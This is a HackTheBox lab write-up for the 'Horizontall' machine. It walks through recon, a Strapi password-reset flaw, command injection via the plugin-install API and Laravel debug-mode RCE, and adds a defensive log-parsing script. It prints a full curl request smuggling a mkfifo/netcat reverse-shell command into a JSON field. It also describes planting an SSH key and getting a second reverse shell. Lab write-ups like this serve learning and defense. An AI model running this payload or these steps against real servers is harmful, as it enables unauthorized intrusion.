HackTheBox-Horizontall
NMAP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL2qJTqj1aoxBGb8yWIN4UJwFs4/UgDEutp3aiL2/6yV2iE78YjGzfU74VKlTRvJZWBwDmIOosOBNl9nfmEzXerD0g5lD5SporBx06eWX/XP
2sQSEKbsqkr7Qb4ncvU8CvDR6yGHxmBT8WGgaQsA2ViVjiqAdlUDmLoT2qA3GeLBQgS41e+TysTpzWlY7z/rf/u0uj/C3kbixSB/upkWoqGyorDtFoaGGvWet/q7j5Tq061MaR6cM2CrYcQxxnPy
4LqFE3MouLklBXfmNovryI0qVFMki7Cc3hfXz6BmKppCzMUPs8VgtNgdcGywIU/Nq1aiGQfATneqDD2GBXLjzV
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIyw6WbPVzY28EbBOZ4zWcikpu/CPcklbTUwvrPou4dCG4koataOo/RDg4MJuQP+sR937/ugmI
NBJNsYC8F7jN0=
| 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJqmDVbv9RjhlUzOMmw3SrGPaiDBgdZ9QZ2cKM49jzYB
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80 (HTTP)
When we visit the web server it redirects us to horizontall.htb, so let's add this to the /etc/hosts file.
We can see from the icon in the title bar that it's built with Vue.js, which is a JavaScript framework. At the bottom of the web page there is a contact form, but clicking the send button doesn't do anything.
I tried to poke around the website manually but didn't find anything, so I ran a nikto scan, but it didn't show anything interesting other than the nginx version, which we already saw in the nmap scan.
I tried fuzzing for files using gobuster and ffuf, but they failed as the connection kept timing out. I ran the tools again to look for subdomains, but that failed as well, so I looked around in the JavaScript files instead.
One of the JavaScript files gave us a subdomain, so let's add it to /etc/hosts and see where it takes us.
From the Wappalyzer results this looks like Strapi CMS, so I searched for known vulnerabilities; Synack had listed some. We can also verify the Strapi version.
The version is 3.0.0-beta.17.4, so we are on the right track.
Let's try visiting the link.
Here it asks us for the admin credentials, so let's try admin:admin, but this fails. Going back to the vulnerabilities page we can see Improper Access Control: there is a flaw in the JavaScript files which doesn't properly handle password resets, so we can reset the password of any user, in this case "admin".
So after googling for the password reset I found a Python script which can reset a user's password by supplying a valid username, the IP address and the new password we want to set.
And we are in the admin panel
Now focusing on getting RCE, I found another article related to it.
curl -i -s -k -X $'POST' -H $'Host: localhost:1337' -H $'Authorization: Bearer [jwt]' -H $'Content-Type: application/json' -H $'Origin: http://localhost:1337' -H $'Content-Length: 123' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f)\",\"port\":\"1337\"}' $'http://localhost:1337/admin/plugins/install'
Here we need to use the JWT token we got after the password reset, so that goes in the Authorization header.
I used --proxy, as I was getting a bad request error because the closing } at the end of the JSON was missing, so I added that in Burp Suite and got a shell.
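As an added defender-side example (not part of the original writeup): the plugin-install route used above is an administrative action, so POSTs to it in the nginx access log in front of Strapi are worth alerting on. The log lines below are constructed, and the log format is assumed to be nginx's default combined format.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Assumes nginx's default "combined" log format in front of the Strapi app.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Strapi admin routes that should only ever be used by a known operator.
# Only the plugin-install route appears in the writeup; extend as needed.
SENSITIVE_ADMIN_ROUTES = {("POST", "/admin/plugins/install")}

# Constructed sample lines, not captured from the box.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Sep/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 901 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Sep/2021:10:02:15 +0000] "POST /admin/plugins/install HTTP/1.1" 200 17 "http://localhost:1337" "curl/7.74.0"
10.10.14.5 - - [01/Sep/2021:10:02:16 +0000] "POST /admin/plugins/install HTTP/1.1" 200 17 "http://localhost:1337" "curl/7.74.0"
10.10.14.9 - - [01/Sep/2021:10:03:00 +0000] "GET /admin/plugins/install HTTP/1.1" 404 9 "-" "Mozilla/5.0"
"""

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into its fields, or None if it doesn't match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def plugin_install_attempts(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (ip, timestamp, user_agent) for every request to a sensitive admin route."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0].rstrip("/")
        if (rec["method"], path) in SENSITIVE_ADMIN_ROUTES:
            hits.append((rec["ip"], rec["ts"], rec["ua"]))
    return hits

def attempts_per_source(lines: List[str]) -> Dict[str, int]:
    """Count sensitive-route requests per client IP, for a simple threshold alert."""
    return dict(Counter(ip for ip, _, _ in plugin_install_attempts(lines)))

if __name__ == "__main__":
    for ip, ts, ua in plugin_install_attempts(SAMPLE_LOG.splitlines()):
        print(f"ALERT plugin install from {ip} at {ts} ({ua})")
```

Request bodies are not in the access log, so this flags the administrative action itself rather than the payload; a plugin install from an unexpected source IP or user agent is the signal.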
Stabilize the shell with python3.
If we take a look at the local ports with ss -tulpn (socket status), we'll see two local ports on which web applications are listening.
The one on port 1337 is the api-prod subdomain we already saw, so we'll need to forward port 8000. We can do this through SSH local port forwarding by adding our public key to the authorized_keys file so we can log in with our private key.
Let's do the port forwarding through SSH.
This shows us the Laravel version, so there must be a CVE for this as well. We can check whether the Laravel application is running in debug mode by visiting /profiles.
Perfect. Now we follow the method for exploiting debug mode to get remote code execution. Clone these two repositories.
First we'll make a PHAR file with the ls command as the command to execute, then run that PHAR file against the Python script.
And the RCE works, so now we can get a reverse shell by including the netcat payload.